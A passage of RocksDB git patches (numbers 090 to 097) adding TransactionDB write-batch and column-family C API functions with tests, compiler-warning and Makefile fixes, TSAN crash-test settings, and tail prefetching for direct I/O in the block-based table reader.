4*) +ifeq ($(CCFALIGNED), yes) CXXFLAGS += -faligned-new endif -else -ifeq ($(CCVERSION), 7) - CXXFLAGS += -faligned-new -endif -endif ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror From 23c7d135405ec14618e6e85f95c0582b9049eaa6 Mon Sep 17 00:00:00 2001 From: jimmyway Date: Wed, 9 Aug 2017 22:56:08 -0700 Subject: [PATCH 090/205] fix comment Summary: Signed-off-by: tang.jin Closes https://github.com/facebook/rocksdb/pull/2644 Differential Revision: D5600861 Pulled By: yiwu-arbug fbshipit-source-id: 9516636cb6e77b09fe0ebef78953adf4b7e88cc8 --- db/write_thread.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/write_thread.h b/db/write_thread.h index 51bb97f2a8d..57ce71e08f3 100644 --- a/db/write_thread.h +++ b/db/write_thread.h @@ -55,7 +55,7 @@ class WriteThread { // The state used to inform a waiting writer that it has become a // parallel memtable writer. It can be the group leader who launch the - // praallel writer group, or one of the followers. The writer should then + // parallel writer group, or one of the followers. The writer should then // apply its batch to the memtable concurrently and call // CompleteParallelMemTableWriter. STATE_PARALLEL_MEMTABLE_WRITER = 8, From 6a9de434775abb2868132e2d438cfe932e225032 Mon Sep 17 00:00:00 2001 From: FireMail Date: Thu, 10 Aug 2017 11:33:30 -0700 Subject: [PATCH 091/205] Windows.h macro call fix Summary: - moved the max call for numeric limits into parentheses so that max won't be expanded as a macro when including Windows.h Closes https://github.com/facebook/rocksdb/pull/2709 Differential Revision: D5600773 Pulled By: yiwu-arbug fbshipit-source-id: fd28b6f7c10ddce21bad4030f2db06f965bb08da --- include/rocksdb/env.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index e2efbdc15fd..709d5036685 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -793,7 +793,7 @@ enum InfoLogLevel : unsigned char { // An interface for writing log messages.
class Logger { public: - size_t kDoNotSupportGetLogFileSize = std::numeric_limits<size_t>::max(); + size_t kDoNotSupportGetLogFileSize = (std::numeric_limits<size_t>::max)(); explicit Logger(const InfoLogLevel log_level = InfoLogLevel::INFO_LEVEL) : log_level_(log_level) {} From 0cecf8155b8a307862995c77e7f55163faca8b86 Mon Sep 17 00:00:00 2001 From: Oleksandr Anyshchenko Date: Thu, 10 Aug 2017 11:39:32 -0700 Subject: [PATCH 092/205] Write batch for `TransactionDB` in C API Summary: Closes https://github.com/facebook/rocksdb/pull/2655 Differential Revision: D5600858 Pulled By: yiwu-arbug fbshipit-source-id: cf52f9104e348438bf168dc6bf7af3837faf12ef --- db/c.cc | 10 ++++++++++ db/c_test.c | 11 +++++++++++ include/rocksdb/c.h | 4 ++++ 3 files changed, 25 insertions(+) diff --git a/db/c.cc b/db/c.cc index e1af3836e6b..68213e48c4a 100644 --- a/db/c.cc +++ b/db/c.cc @@ -3363,6 +3363,16 @@ void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, txn_db->rep->Put(options->rep, Slice(key, klen), Slice(val, vlen))); } +// Write batch into transaction db +void rocksdb_transactiondb_write( + rocksdb_transactiondb_t* db, + const rocksdb_writeoptions_t* options, + rocksdb_writebatch_t* batch, + char** errptr) { + SaveError(errptr, db->rep->Write(options->rep, &batch->rep)); +} + + // Delete a key inside a transaction void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr) { diff --git a/db/c_test.c b/db/c_test.c index 4bdf89bee52..209af13ac7e 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -1365,6 +1365,17 @@ int main(int argc, char** argv) { CheckNoError(err); CheckTxnDBGet(txn_db, roptions, "foo", NULL); + // write batch into TransactionDB + rocksdb_writebatch_t* wb = rocksdb_writebatch_create(); + rocksdb_writebatch_put(wb, "foo", 3, "a", 1); + rocksdb_writebatch_clear(wb); + rocksdb_writebatch_put(wb, "bar", 3, "b", 1); + rocksdb_writebatch_put(wb, "box", 3, "c", 1); + rocksdb_writebatch_delete(wb, "bar", 3); + rocksdb_transactiondb_write(txn_db, woptions, wb, &err); + CheckTxnDBGet(txn_db, roptions, "box", "c"); + CheckNoError(err); + // begin a transaction txn = rocksdb_transaction_begin(txn_db, woptions, txn_options, NULL); // put diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 2d33560390d..3d3c175f918 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -1298,6 +1298,10 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, const char* val, size_t vlen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_writebatch_t *batch, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete( rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr); From 64f8484356ee611d90a77e6b02f6855a5c26cc17 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Thu, 10 Aug 2017 11:56:46 -0700 Subject: [PATCH 093/205] block_cache_tier: fix gcc-7 warnings MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Summary: Error was: utilities/persistent_cache/block_cache_tier.cc: In instantiation of ‘void rocksdb::Add(std::map<std::__cxx11::basic_string<char>, double>*, const string&, const T&) [with T = double; std::__cxx11::string = std::__cxx11::basic_string<char>]’: utilities/persistent_cache/block_cache_tier.cc:147:40: required from here utilities/persistent_cache/block_cache_tier.cc:141:23: error: type qualifiers ignored
on cast result type [-Werror=ignored-qualifiers] stats->insert({key, static_cast<const double>(t)}); Fixing it like #2562. Closes https://github.com/facebook/rocksdb/pull/2603 Differential Revision: D5600910 Pulled By: yiwu-arbug fbshipit-source-id: 891a5ec7e451d2dec6ad1b6b7fac545657f87363 --- utilities/persistent_cache/block_cache_tier.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/utilities/persistent_cache/block_cache_tier.cc b/utilities/persistent_cache/block_cache_tier.cc index e65952cdb0b..714af2c62a6 100644 --- a/utilities/persistent_cache/block_cache_tier.cc +++ b/utilities/persistent_cache/block_cache_tier.cc @@ -136,7 +136,7 @@ Status BlockCacheTier::Close() { template <class T> void Add(std::map<std::string, double>* stats, const std::string& key, const T& t) { - stats->insert({key, static_cast<const double>(t)}); + stats->insert({key, static_cast<double>(t)}); } PersistentCache::StatsType BlockCacheTier::Stats() { From 25df24254b77911b474012a98cfaedbeae4ded6e Mon Sep 17 00:00:00 2001 From: Stanislav Tkach Date: Thu, 10 Aug 2017 13:40:57 -0700 Subject: [PATCH 094/205] Add column families related functions (C API) Summary: (#2564) Closes https://github.com/facebook/rocksdb/pull/2669 Differential Revision: D5594151 Pulled By: yiwu-arbug fbshipit-source-id: 67ae9446342f3323d6ecad8e811f4158da194270 --- db/c.cc | 85 ++++++++++++++++++++++++++++++++++++++++++++- db/c_test.c | 31 +++++++++++++++++ include/rocksdb/c.h | 34 ++++++++++++++++++ 3 files changed, 149 insertions(+), 1 deletion(-) diff --git a/db/c.cc b/db/c.cc index 68213e48c4a..6952660a1b8 100644 --- a/db/c.cc +++ b/db/c.cc @@ -3249,6 +3249,17 @@ void rocksdb_transaction_options_set_max_write_batch_size( opt->rep.max_write_batch_size = size; } +rocksdb_column_family_handle_t* rocksdb_transactiondb_create_column_family( + rocksdb_transactiondb_t* txn_db, + const rocksdb_options_t* column_family_options, + const char* column_family_name, char** errptr) { + rocksdb_column_family_handle_t* handle = new rocksdb_column_family_handle_t; + SaveError(errptr, txn_db->rep->CreateColumnFamily( + ColumnFamilyOptions(column_family_options->rep), + std::string(column_family_name), &(handle->rep))); + return handle; +} + rocksdb_transactiondb_t* rocksdb_transactiondb_open( const rocksdb_options_t* options, const rocksdb_transactiondb_options_t* txn_db_options, const char* name, @@ -3325,6 +3336,27 @@ char* rocksdb_transaction_get(rocksdb_transaction_t* txn, return result; } +char* rocksdb_transaction_get_cf(rocksdb_transaction_t* txn, + const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, size_t* vlen, + char** errptr) { + char* result = nullptr; + std::string tmp; + Status s = + txn->rep->Get(options->rep, column_family->rep, Slice(key, klen), &tmp); + if (s.ok()) { + *vlen = tmp.size(); + result = CopyString(tmp); + } else { + *vlen = 0; + if (!s.IsNotFound()) { + SaveError(errptr, s); + } + } + return result; +} + // Read a key outside a transaction char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, @@ -3347,6 +3379,26 @@ char* rocksdb_transactiondb_get( return result; } +char* rocksdb_transactiondb_get_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, size_t* vallen, char** errptr) { + char* result = nullptr; + std::string tmp; + Status s = txn_db->rep->Get(options->rep, column_family->rep, + Slice(key, keylen), &tmp); + if (s.ok()) { + *vallen = tmp.size(); + result = CopyString(tmp); + } else {
+ *vallen = 0; + if (!s.IsNotFound()) { + SaveError(errptr, s); + } + } + return result; +} + // Put a key inside a transaction void rocksdb_transaction_put(rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val, size_t vlen, @@ -3354,6 +3406,14 @@ void rocksdb_transaction_put(rocksdb_transaction_t* txn, const char* key, SaveError(errptr, txn->rep->Put(Slice(key, klen), Slice(val, vlen))); } +void rocksdb_transaction_put_cf(rocksdb_transaction_t* txn, + rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, const char* val, + size_t vlen, char** errptr) { + SaveError(errptr, txn->rep->Put(column_family->rep, Slice(key, klen), + Slice(val, vlen))); +} + //Put a key outside a transaction void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, @@ -3363,6 +3423,16 @@ void rocksdb_transactiondb_put(rocksdb_transactiondb_t* txn_db, txn_db->rep->Put(options->rep, Slice(key, klen), Slice(val, vlen))); } +void rocksdb_transactiondb_put_cf(rocksdb_transactiondb_t* txn_db, + const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, + const char* key, size_t keylen, + const char* val, size_t vallen, + char** errptr) { + SaveError(errptr, txn_db->rep->Put(options->rep, column_family->rep, + Slice(key, keylen), Slice(val, vallen))); +} + //Write batch into transaction db void rocksdb_transactiondb_write( rocksdb_transactiondb_t* db, @@ -3372,13 +3442,18 @@ void rocksdb_transactiondb_write( SaveError(errptr, db->rep->Write(options->rep, &batch->rep)); } - // Delete a key inside a transaction void rocksdb_transaction_delete(rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr) { SaveError(errptr, txn->rep->Delete(Slice(key, klen))); } +void rocksdb_transaction_delete_cf( + rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, char** errptr) { + SaveError(errptr, txn->rep->Delete(column_family->rep, Slice(key, klen))); +} + // Delete a key outside a transaction void rocksdb_transactiondb_delete(rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, @@ -3386,6 +3461,14 @@ void rocksdb_transactiondb_delete(rocksdb_transactiondb_t* txn_db, SaveError(errptr, txn_db->rep->Delete(options->rep, Slice(key, klen))); } +void rocksdb_transactiondb_delete_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, char** errptr) { + SaveError(errptr, txn_db->rep->Delete(options->rep, column_family->rep, + Slice(key, keylen))); +} + // Create an iterator inside a transaction rocksdb_iterator_t* rocksdb_transaction_create_iterator( rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options) { diff --git a/db/c_test.c b/db/c_test.c index 209af13ac7e..95d27360748 100644 --- a/db/c_test.c +++ b/db/c_test.c @@ -348,6 +348,20 @@ static void CheckTxnDBGet( Free(&val); } +static void CheckTxnDBGetCF(rocksdb_transactiondb_t* txn_db, + const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, + const char* key, const char* expected) { + char* err = NULL; + size_t val_len; + char* val; + val = rocksdb_transactiondb_get_cf(txn_db, options, column_family, key, + strlen(key), &val_len, &err); + CheckNoError(err); + CheckEqual(expected, val, val_len); + Free(&val); +} + int main(int argc, char** argv) { rocksdb_t* db; rocksdb_comparator_t* cmp; @@ -1432,6 +1446,23 @@ int main(int argc, char** 
argv) { CheckNoError(err); CheckTxnDBGet(txn_db, roptions, "bar", NULL); + // Column families. + rocksdb_column_family_handle_t* cfh; + cfh = rocksdb_transactiondb_create_column_family(txn_db, options, + "txn_db_cf", &err); + CheckNoError(err); + + rocksdb_transactiondb_put_cf(txn_db, woptions, cfh, "cf_foo", 6, "cf_hello", + 8, &err); + CheckNoError(err); + CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", "cf_hello"); + + rocksdb_transactiondb_delete_cf(txn_db, woptions, cfh, "cf_foo", 6, &err); + CheckNoError(err); + CheckTxnDBGetCF(txn_db, roptions, cfh, "cf_foo", NULL); + + rocksdb_column_family_handle_destroy(cfh); + // close and destroy rocksdb_transaction_destroy(txn); rocksdb_transactiondb_close(txn_db); diff --git a/include/rocksdb/c.h b/include/rocksdb/c.h index 3d3c175f918..077030775f7 100644 --- a/include/rocksdb/c.h +++ b/include/rocksdb/c.h @@ -1256,6 +1256,12 @@ extern ROCKSDB_LIBRARY_API void rocksdb_delete_file_in_range_cf( /* Transactions */ +extern ROCKSDB_LIBRARY_API rocksdb_column_family_handle_t* +rocksdb_transactiondb_create_column_family( + rocksdb_transactiondb_t* txn_db, + const rocksdb_options_t* column_family_options, + const char* column_family_name, char** errptr); + extern ROCKSDB_LIBRARY_API rocksdb_transactiondb_t* rocksdb_transactiondb_open( const rocksdb_options_t* options, const rocksdb_transactiondb_options_t* txn_db_options, const char* name, @@ -1286,18 +1292,37 @@ extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get( rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); +extern ROCKSDB_LIBRARY_API char* rocksdb_transaction_get_cf( + rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, size_t klen, + size_t* vlen, char** errptr); + extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get( rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, const char* key, size_t klen, size_t* vlen, char** errptr); +extern ROCKSDB_LIBRARY_API char* rocksdb_transactiondb_get_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_readoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, size_t* vallen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put( rocksdb_transaction_t* txn, const char* key, size_t klen, const char* val, size_t vlen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transaction_put_cf( + rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, const char* val, size_t vlen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, const char* val, size_t vlen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_put_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, const char* val, size_t vallen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, rocksdb_writebatch_t *batch, char** errptr); @@ -1305,10 +1330,19 @@ extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_write( extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete( rocksdb_transaction_t* txn, const char* key, size_t klen, char** errptr); 
+extern ROCKSDB_LIBRARY_API void rocksdb_transaction_delete_cf( + rocksdb_transaction_t* txn, rocksdb_column_family_handle_t* column_family, + const char* key, size_t klen, char** errptr); + extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete( rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, const char* key, size_t klen, char** errptr); +extern ROCKSDB_LIBRARY_API void rocksdb_transactiondb_delete_cf( + rocksdb_transactiondb_t* txn_db, const rocksdb_writeoptions_t* options, + rocksdb_column_family_handle_t* column_family, const char* key, + size_t keylen, char** errptr); + extern ROCKSDB_LIBRARY_API rocksdb_iterator_t* rocksdb_transaction_create_iterator(rocksdb_transaction_t* txn, const rocksdb_readoptions_t* options); From b87ee6f7736a0e22cb72b188c1167eab38b25a09 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Thu, 10 Aug 2017 17:53:54 -0700 Subject: [PATCH 095/205] Use more keys per lock in daily TSAN crash test Summary: TSAN shows an error when we grab too many locks at the same time. In the TSAN crash test, make one shard key cover 2^22 keys so that not as many locks will be held at the same time. Closes https://github.com/facebook/rocksdb/pull/2719 Differential Revision: D5609035 Pulled By: siying fbshipit-source-id: 930e5d63fff92dbc193dc154c4c615efbdf06c6a --- Makefile | 8 ++++---- build_tools/rocksdb-lego-determinator | 2 +- tools/db_crashtest.py | 1 + 3 files changed, 6 insertions(+), 5 deletions(-) diff --git a/Makefile b/Makefile index 620e7fb2772..87831fc1aef 100644 --- a/Makefile +++ b/Makefile @@ -802,8 +802,8 @@ ldb_tests: ldb crash_test: whitebox_crash_test blackbox_crash_test blackbox_crash_test: db_stress - python -u tools/db_crashtest.py --simple blackbox - python -u tools/db_crashtest.py blackbox + python -u tools/db_crashtest.py --simple blackbox $(CRASH_TEST_EXT_ARGS) + python -u tools/db_crashtest.py blackbox $(CRASH_TEST_EXT_ARGS) ifeq ($(CRASH_TEST_KILL_ODD),) CRASH_TEST_KILL_ODD=888887 @@ -811,9 +811,9 @@ endif whitebox_crash_test: db_stress python -u tools/db_crashtest.py --simple whitebox --random_kill_odd \ - $(CRASH_TEST_KILL_ODD) + $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS) python -u tools/db_crashtest.py whitebox --random_kill_odd \ - $(CRASH_TEST_KILL_ODD) + $(CRASH_TEST_KILL_ODD) $(CRASH_TEST_EXT_ARGS) asan_check: $(MAKE) clean diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index 300a60aab95..a40b3064e44 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -564,7 +564,7 @@ TSAN_CRASH_TEST_COMMANDS="[ { 'name':'Compile and run', 'timeout': 86400, - 'shell':'set -o pipefail && $SHM $DEBUG $TSAN CRASH_TEST_KILL_ODD=1887 make J=1 crash_test || $CONTRUN_NAME=tsan_crash_test $TASK_CREATION_TOOL', + 'shell':'set -o pipefail && $SHM $DEBUG $TSAN CRASH_TEST_KILL_ODD=1887 CRASH_TEST_EXT_ARGS=--log2_keys_per_lock=22 make J=1 crash_test || $CONTRUN_NAME=tsan_crash_test $TASK_CREATION_TOOL', 'user':'root', $PARSER }, diff --git a/tools/db_crashtest.py b/tools/db_crashtest.py index 83c1e013b64..d64da7ac1fb 100644 --- a/tools/db_crashtest.py +++ b/tools/db_crashtest.py @@ -44,6 +44,7 @@ "verify_checksum": 1, "write_buffer_size": 4 * 1024 * 1024, "writepercent": 35, + "log2_keys_per_lock": 2, "subcompactions": lambda: random.randint(1, 4), "use_merge": lambda: random.randint(0, 1), "use_full_merge_v1": lambda: random.randint(0, 1), From ad77ee0ea02133d16cd76ddd0624cc4ae402422c Mon Sep 17 00:00:00 2001 From: yiwu-arbug Date: Thu, 10 Aug 2017 21:10:41 -0700
Subject: [PATCH 096/205] Revert "Makefile: correct faligned-new test" Summary: This reverts #2699 to fix the clang build. Closes https://github.com/facebook/rocksdb/pull/2723 Differential Revision: D5610207 Pulled By: yiwu-arbug fbshipit-source-id: 6857f4556d6d18f17b74cf81fa936d1dc0bd364c --- Makefile | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/Makefile b/Makefile index 87831fc1aef..9b80864fcd8 100644 --- a/Makefile +++ b/Makefile @@ -259,11 +259,18 @@ default: all WARNING_FLAGS = -W -Wextra -Wall -Wsign-compare -Wshadow \ -Wno-unused-parameter -CCFALIGNED := $(shell $(CXX) --version | awk 'NR==1 { split($$3, ver, "."); if (($$1 == "clang" && ver[1] >= 4) || ($$2 == "(GCC)" && ver[1] >= 7)) { print "yes" } }') +CCVERSION = $(shell $(CXX) -dumpversion) +CCNAME = $(shell $(CXX) --version | awk 'NR==1' | cut -f1 -d " ") -ifeq ($(CCFALIGNED), yes) +ifeq ($(CCNAME), clang) +ifeq ($(CCVERSION), 4*) CXXFLAGS += -faligned-new endif +else +ifeq ($(CCVERSION), 7) + CXXFLAGS += -faligned-new +endif +endif ifndef DISABLE_WARNING_AS_ERROR WARNING_FLAGS += -Werror From 666a005f9b9231800e31ea2276b8da89d665e608 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Fri, 11 Aug 2017 11:59:13 -0700 Subject: [PATCH 097/205] Support prefetch last 512KB with direct I/O in block based file reader Summary: Right now, if direct I/O is enabled, prefetching the last 512KB cannot be applied, except for compaction inputs or when readahead is enabled for iterators. This can create a lot of I/O for HDD cases. To solve the problem, the 512KB is prefetched in the block based table if direct I/O is enabled. The prefetched buffer is passed in together with the random access file reader, so that we try to read from the buffer before reading from the file. This can be extended in the future to support flexible user iterator readahead too. Closes https://github.com/facebook/rocksdb/pull/2708 Differential Revision: D5593091 Pulled By: siying fbshipit-source-id: ee36ff6d8af11c312a2622272b21957a7b5c81e7 --- db/db_test2.cc | 11 +- table/adaptive_table_factory.cc | 3 +- table/block_based_table_reader.cc | 186 +++++++++++++++++------------ table/block_based_table_reader.h | 8 +- table/format.cc | 189 +++++++++++++++++------------- table/format.h | 12 +- table/meta_blocks.cc | 44 ++++--- table/meta_blocks.h | 8 +- table/partitioned_filter_block.cc | 15 ++- table/partitioned_filter_block.h | 3 +- table/plain_table_reader.cc | 13 +- tools/sst_dump_tool.cc | 3 +- util/file_reader_writer.cc | 28 +++++ util/file_reader_writer.h | 11 ++ 14 files changed, 333 insertions(+), 201 deletions(-) diff --git a/db/db_test2.cc b/db/db_test2.cc index ca8986c4d8d..c223f2b0082 100644 --- a/db/db_test2.cc +++ b/db/db_test2.cc @@ -2282,12 +2282,15 @@ TEST_F(DBTest2, RateLimitedCompactionReads) { // chose 1MB as the upper bound on the total bytes read. size_t rate_limited_bytes = options.rate_limiter->GetTotalBytesThrough(Env::IO_LOW); - ASSERT_GE( - rate_limited_bytes, - static_cast<size_t>(kNumKeysPerFile * kBytesPerKey * kNumL0Files)); + // Include the explicit prefetch of the footer in direct I/O case. + size_t direct_io_extra = use_direct_io ?
512 * 1024 : 0; + ASSERT_GE(rate_limited_bytes, + static_cast(kNumKeysPerFile * kBytesPerKey * kNumL0Files + + direct_io_extra)); ASSERT_LT( rate_limited_bytes, - static_cast(2 * kNumKeysPerFile * kBytesPerKey * kNumL0Files)); + static_cast(2 * kNumKeysPerFile * kBytesPerKey * kNumL0Files + + direct_io_extra)); Iterator* iter = db_->NewIterator(ReadOptions()); for (iter->SeekToFirst(); iter->Valid(); iter->Next()) { diff --git a/table/adaptive_table_factory.cc b/table/adaptive_table_factory.cc index f83905dff3a..47069f86695 100644 --- a/table/adaptive_table_factory.cc +++ b/table/adaptive_table_factory.cc @@ -46,7 +46,8 @@ Status AdaptiveTableFactory::NewTableReader( unique_ptr* table, bool prefetch_index_and_filter_in_cache) const { Footer footer; - auto s = ReadFooterFromFile(file.get(), file_size, &footer); + auto s = ReadFooterFromFile(file.get(), nullptr /* prefetch_buffer */, + file_size, &footer); if (!s.ok()) { return s; } diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 5931692f029..89e0c735490 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -70,17 +70,17 @@ namespace { // On success fill *result and return OK - caller owns *result // @param compression_dict Data for presetting the compression library's // dictionary. -Status ReadBlockFromFile(RandomAccessFileReader* file, const Footer& footer, - const ReadOptions& options, const BlockHandle& handle, - std::unique_ptr* result, - const ImmutableCFOptions& ioptions, bool do_uncompress, - const Slice& compression_dict, - const PersistentCacheOptions& cache_options, - SequenceNumber global_seqno, - size_t read_amp_bytes_per_bit) { +Status ReadBlockFromFile( + RandomAccessFileReader* file, FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const ReadOptions& options, const BlockHandle& handle, + std::unique_ptr* result, const ImmutableCFOptions& ioptions, + bool do_uncompress, const Slice& compression_dict, + const PersistentCacheOptions& cache_options, SequenceNumber global_seqno, + size_t read_amp_bytes_per_bit) { BlockContents contents; - Status s = ReadBlockContents(file, footer, options, handle, &contents, ioptions, - do_uncompress, compression_dict, cache_options); + Status s = ReadBlockContents(file, prefetch_buffer, footer, options, handle, + &contents, ioptions, do_uncompress, + compression_dict, cache_options); if (s.ok()) { result->reset(new Block(std::move(contents), global_seqno, read_amp_bytes_per_bit, ioptions.statistics)); @@ -157,6 +157,7 @@ class PartitionIndexReader : public IndexReader, public Cleanable { // On success, index_reader will be populated; otherwise it will remain // unmodified. 
static Status Create(BlockBasedTable* table, RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, const Footer& footer, const BlockHandle& index_handle, const ImmutableCFOptions& ioptions, const InternalKeyComparator* icomparator, @@ -165,8 +166,9 @@ class PartitionIndexReader : public IndexReader, public Cleanable { const int level) { std::unique_ptr index_block; auto s = ReadBlockFromFile( - file, footer, ReadOptions(), index_handle, &index_block, ioptions, - true /* decompress */, Slice() /*compression dict*/, cache_options, + file, prefetch_buffer, footer, ReadOptions(), index_handle, + &index_block, ioptions, true /* decompress */, + Slice() /*compression dict*/, cache_options, kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */); if (s.ok()) { @@ -238,16 +240,18 @@ class BinarySearchIndexReader : public IndexReader { // `BinarySearchIndexReader`. // On success, index_reader will be populated; otherwise it will remain // unmodified. - static Status Create(RandomAccessFileReader* file, const Footer& footer, - const BlockHandle& index_handle, + static Status Create(RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, + const Footer& footer, const BlockHandle& index_handle, const ImmutableCFOptions& ioptions, const InternalKeyComparator* icomparator, IndexReader** index_reader, const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( - file, footer, ReadOptions(), index_handle, &index_block, ioptions, - true /* decompress */, Slice() /*compression dict*/, cache_options, + file, prefetch_buffer, footer, ReadOptions(), index_handle, + &index_block, ioptions, true /* decompress */, + Slice() /*compression dict*/, cache_options, kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */); if (s.ok()) { @@ -289,6 +293,7 @@ class HashIndexReader : public IndexReader { public: static Status Create(const SliceTransform* hash_key_extractor, const Footer& footer, RandomAccessFileReader* file, + FilePrefetchBuffer* prefetch_buffer, const ImmutableCFOptions& ioptions, const InternalKeyComparator* icomparator, const BlockHandle& index_handle, @@ -298,8 +303,9 @@ class HashIndexReader : public IndexReader { const PersistentCacheOptions& cache_options) { std::unique_ptr index_block; auto s = ReadBlockFromFile( - file, footer, ReadOptions(), index_handle, &index_block, ioptions, - true /* decompress */, Slice() /*compression dict*/, cache_options, + file, prefetch_buffer, footer, ReadOptions(), index_handle, + &index_block, ioptions, true /* decompress */, + Slice() /*compression dict*/, cache_options, kDisableGlobalSequenceNumber, 0 /* read_amp_bytes_per_bit */); if (!s.ok()) { @@ -335,15 +341,17 @@ class HashIndexReader : public IndexReader { // Read contents for the blocks BlockContents prefixes_contents; - s = ReadBlockContents(file, footer, ReadOptions(), prefixes_handle, - &prefixes_contents, ioptions, true /* decompress */, - Slice() /*compression dict*/, cache_options); + s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(), + prefixes_handle, &prefixes_contents, ioptions, + true /* decompress */, Slice() /*compression dict*/, + cache_options); if (!s.ok()) { return s; } BlockContents prefixes_meta_contents; - s = ReadBlockContents(file, footer, ReadOptions(), prefixes_meta_handle, - &prefixes_meta_contents, ioptions, true /* decompress */, + s = ReadBlockContents(file, prefetch_buffer, footer, ReadOptions(), + prefixes_meta_handle, &prefixes_meta_contents, + ioptions, true /* decompress */, 
Slice() /*compression dict*/, cache_options); if (!s.ok()) { // TODO: log error @@ -535,12 +543,29 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, Footer footer; + std::unique_ptr prefetch_buffer; + // Before read footer, readahead backwards to prefetch data - Status s = - file->Prefetch((file_size < 512 * 1024 ? 0 : file_size - 512 * 1024), - 512 * 1024 /* 512 KB prefetching */); - s = ReadFooterFromFile(file.get(), file_size, &footer, - kBlockBasedTableMagicNumber); + const size_t kTailPrefetchSize = 512 * 1024; + size_t prefetch_off; + size_t prefetch_len; + if (file_size < kTailPrefetchSize) { + prefetch_off = 0; + prefetch_len = file_size; + } else { + prefetch_off = file_size - kTailPrefetchSize; + prefetch_len = kTailPrefetchSize; + } + Status s; + // TODO should not have this special logic in the future. + if (!file->use_direct_io()) { + s = file->Prefetch(prefetch_off, prefetch_len); + } else { + prefetch_buffer.reset(new FilePrefetchBuffer()); + s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len); + } + s = ReadFooterFromFile(file.get(), prefetch_buffer.get(), file_size, &footer, + kBlockBasedTableMagicNumber); if (!s.ok()) { return s; } @@ -577,7 +602,7 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, // Read meta index 